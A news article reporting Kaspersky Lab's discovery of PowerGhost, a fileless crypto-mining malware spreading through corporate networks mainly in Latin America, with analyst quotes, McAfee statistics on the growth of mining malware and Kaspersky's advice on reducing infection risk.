New Fileless Crypto Mining Malware Targeting Corporate Servers, Says Kaspersky Labbr>
A new cryptojacking malware that targets corporations in multiple countries, mostly in Latin America, has been uncovered by Kaspersky Lab, an international software security group.
Dubbed PowerGhost, the crypto mining malware creates new coins by using the computing power of a victim PC and mobile devices. It is distributed within corporate networks, infecting both workstations and servers. To increase the complexity of its detection and remediation, the mining malware does not store its body directly onto a disk. PowerGhost uses multiple fileless techniques to discreetly gain a foothold in corporate networks. According to Kaspersky, the main victims of this attack so far have been corporate users in Brazil, Colombia, India, and Turkey.
“Machine infection occurs remotely through exploits or remote administration tools,” the security group said. “When the machine is infected, the main body of the miner is downloaded and run without being stored on the hard disk. Once this has happened, cybercriminals can arrange for the miner to automatically update, spread within the network, and launch the crypto-mining process.”
Vladas Bulavas, malware analyst at Kaspersky Lab, said that PowerGhost attacks on businesses, for the purpose of installing miners, raise new concerns about crypto mining software.
“The miner we examined indicates that targeting users is not enough – cybercriminals are now turning their attention to enterprises too,” said Bulavas. “And this makes cryptocurrency mining a threat to the business community.”
Earlier this month, cybersecurity firm McAfee reported that crypto mining malware grew at 629 percent in Q1 2018, rocketing from around 400,000 total known samples in Q4 2017 to over 2.9 million the next quarter. Crypto mining malware has also replaced ransomware as the main type of malicious software due to high–profit opportunity and low chance of being discovered.
To reduce the risk of infection, Kaspersky Lab has advised companies to educate their employees and IT teams and keep sensitive data separate. They should also use a dedicated security solution that is empowered with application control, behaviour detection, and exploit prevention components that monitor the suspicious actions of applications and block malicious file executions.